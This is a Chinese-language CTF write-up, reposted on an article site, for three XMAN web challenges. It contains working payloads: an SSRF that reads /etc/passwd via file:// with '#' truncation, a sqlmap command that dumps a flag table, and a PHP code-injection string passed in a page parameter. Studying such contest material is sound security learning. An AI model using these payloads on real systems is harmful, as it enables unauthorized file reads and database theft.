美文网首页
XMAN -个人排位赛 WEB-WRITEup

XMAN -个人排位赛 WEB-WRITEup

作者: sgdream | 来源:发表于2018-08-11 14:43 被阅读0次

XMAN -个人排位赛 WEB-WRITEup

Simple SSRF

+ 备注:curl + #  截断

  • 首先在输入框输入发现只能输入www.baidu.com这个域名并测试出用井号(%23)可以进行截断

  • 于是测试用file:// 尝试读取本地文件

  •   http://202.112.51.184:11080/?submit=%CC%E1%BD%BB%B2%E9%D1%AF&site=file://www.baidu.com/etc/passwd%23

    发现可以读取成功


    ssrf1.png

    (容我真的没有想到flag会在etc/flag.txt)

      view-source:http://202.112.51.184:11080/?submit=%CC%E1%BD%BB%B2%E9%D1%AF&site=file://www.baidu.com/etc/flag.txt%23
    ssrf2.png

bbsqli

直接放到sqlmap中跑出结果

c:/python27/python.exe  sqlmap.py -u "http://202.112.51.184:16080" --cookie "PHPSESSID=56a230bad525bab2c441cb1f64d7106e" --level 2 -D sqli -T [GDJM_flag]  -C flag --dump
bbsqli.png 
flag:xman{YoVr_4R3_a_Bada5s_Ge7_My_Fl4g}

makeit

  • 首先看到 http://202.112.51.184:15080/?page=about 中有I used Git

    makeit1.png

    于是直接Githack index.php

    makeit2.png

    构造 page=1') or print_r(file_get_contents('templates/flag.php'));//

    view-source:http://202.112.51.184:15080/?page=1') or print_r(file_get_contents('templates/flag.php'));//
    makeit3.png
    XMAN{flag_is_so_cool}

相关文章

  • XMAN -个人排位赛 WEB-WRITEup

    XMAN -个人排位赛 WEB-WRITEup Simple SSRF 首先在输入框输入发现只能输入www.bai...

  • [XMAN]个人排位赛

    XSS1 admin=xman{eVEn_CSP_you_G37_mY_C00K1e} Login 查看源码 , ...

  • XMAN个人排位赛

    easyheap: 本题是简单的堆溢出,我们先将文件运行一下,看下程序想要执行的具体功能是什么。 可以看到该程序是...

  • XMAN排位赛+课堂练习WP

    misc xman通行证 一道签到题先一波base64解密,然后栅栏,然后凯撒 最坑的还是最后那里,不知道是我方法...

  • vcs 加密

    +protect +Xman

  • XMAN个人赛

    栈溢出,本题可以使用return2libc的方法来解决,用binwalk查看文件属性 查看一下程序使用了什么保护机...

  • happymoctf Web-Writeup

    happymoctf有的环境还在,写一下wp。比赛地址:http://happy.moctf.com/,有点骚。 ...

  • CGCTF Web-Writeup

    抽空整理了一下CGCTF平台的Web题的writeup。 0x01 签到题(题目地址:http://chinal...

  • 我是Xman!

    我的名字叫郑策,我的英文名叫Xm an,今年8岁。我喜欢机器人、足球、羽毛球、手工、画画,我的梦想是成为一个发明家!

  • 人设

    圈名:Erik Evans 主圈:欧美 主皮: MAR:TS/Jar。 Xman:E/C/angle/Peter ...

网友评论

      本文标题:XMAN -个人排位赛 WEB-WRITEup

      本文链接:https://www.haomeiwen.com/subject/zmddbftx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|XMAN -个人排位赛 WEB-WRITEup|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!